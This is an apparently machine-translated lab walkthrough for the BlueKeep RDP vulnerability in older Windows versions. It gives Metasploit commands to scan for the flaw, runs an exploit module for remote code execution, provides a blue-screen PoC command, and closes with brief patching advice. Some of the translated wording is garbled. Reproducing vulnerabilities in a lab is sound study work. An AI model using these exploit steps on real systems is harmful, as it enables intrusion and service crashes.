table of Contents
Vulnerability description
When an unauthenticated attacker uses RDP to connect to the target system and send a specially designed request (also known as "Remote Desktop Service Remote Code Execution Vulnerability"), there is a remote code execution vulnerability in Remote Desktop Service (previously known as For terminal services).
Impact version
- Windows XP SP3 x86
- Windows XP Professional x64 Edition SP2
- Windows XP Embedded SP3 x86
- Windows Server 2003 SP2 x86
- Windows Server 2003 x64 version SP2
- Windows Server 2003 R2 SP2
- Windows Server 2003 R2 x64版SP2
- Windows Vista SP2
- Windows Vista x64 version SP2
- Windows 7
Vulnerability environment construction
Thunder download:
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
When creating a virtual machine, remember to choose the professional version to install, the default home version (the home version has no remote connection)
enables remote connection
Vulnerability detection
kali tool
Start msf
msfconsole
Search vulnerability detection exp
search 2019_0708
Load the module, set the ip to be detected
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.234.129
run
The prompt The target is vulnerable
indicates that the vulnerability exists.
Multi-ip detection only needs to set the ip format to the following rules
set rhosts 192.168.234.128-133
Detection tool under windows
Tool download address: https://github.com/k8gege/CVE-2019-0708
Tool usage:
#批量扫描
rdpscan.exe 192.168.234.1-192.168.234.254
#单个扫描
rdpscan.exe 192.168.234.129
If there VULNERABLE - CVE-2019-0708
is a vulnerability
Exploit
Vulnerability restrictions are relatively large, the rec scripts currently found are only for windows 7 systems
Remote code execution
Attack machine: kali
target machine: windows 7
#启动msf
msfconsole
# 搜索2019-0708漏洞模块
search 2019-0708
#选择利用模块
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
#设置ip并进行工具
set rhosts 192.168.234.132
#修改目标系统类型(视情况而定)
set target 1
#执行攻击
run
If set target 1
not, we need to try the exp scripts of other systems, show targets
you can view the exp scripts for the corresponding system
Blue screen
Use tool:
https://github.com/CVE-2019-0708/CVE-2019-0708
Instructions:
#python PoC.py ip
python PoC.py 192.168.234.129
Can use WinXP | XP Embedded | Win7 | Server 2003 | Server 2008 system blue screen
Vulnerability hardening
- Install a 360, Tinder and other security software.
- Install the official Microsoft patch: https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708